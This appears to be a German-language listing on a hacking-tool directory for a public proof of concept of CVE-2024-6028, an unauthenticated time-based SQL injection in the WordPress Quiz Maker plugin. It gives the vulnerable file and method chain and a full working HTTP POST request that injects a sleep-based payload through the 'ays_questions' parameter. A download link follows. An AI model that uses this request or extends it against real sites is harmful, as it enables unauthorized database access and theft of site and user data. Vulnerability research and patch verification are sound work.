Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-6028-Poc — CVE-2024-6028 Quiz Maker <= 6.5.8.3 - Nicht authentifizierte SQL-Injection über den Parameter 'ays_questions' | Kitploit
Tools/GitHubGitHub/gmh5225/cve-2024-6028-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubgmh5225/cve-2024-6028-poc

CVE-2024-6028-Poc

CVE-2024-6028 Quiz Maker <= 6.5.8.3 - Nicht authentifizierte SQL-Injection über den Parameter 'ays_questions'

Repository anzeigen
vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-6028-Poc

CVE-2024-6028 Quiz Maker <= 6.5.8.3 - Nicht authentifizierte SQL-Injection über den Parameter 'ays_questions'

Beschreibung

Das Quiz Maker-Plugin für WordPress ist anfällig für zeitbasierte SQL-Injection über den Parameter 'ays_questions' in allen Versionen bis einschließlich 6.5.8.3, aufgrund unzureichender Maskierung des benutzergesteuerten Parameters und fehlender ausreichender Vorbereitung der bestehenden SQL-Abfrage. Dadurch können nicht authentifizierte Angreifer zusätzliche SQL-Abfragen in bereits vorhandene Abfragen einfügen, die zum Extrahieren sensibler Informationen aus der Datenbank verwendet werden können.

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quiz-maker/quiz-maker-6583-unauthenticated-sql-injection-via-ays-questions-parameter

Datei: wp-content/plugins/quiz-maker/public/class-quiz-maker-public.php

Klasse: Quiz_Maker_Public

Workflow: Methode ays_finish_quiz -> Methode get_questions_categories image image image

PoC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <Host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 114

ays_quiz_id=1&ays_quiz_questions=1,2,3&quiz_id=1&ays_questions[ays-question-4)+or+sleep(if(1>0,5,0)]=&action=ays_finish_quiz

image

Tool herunterladen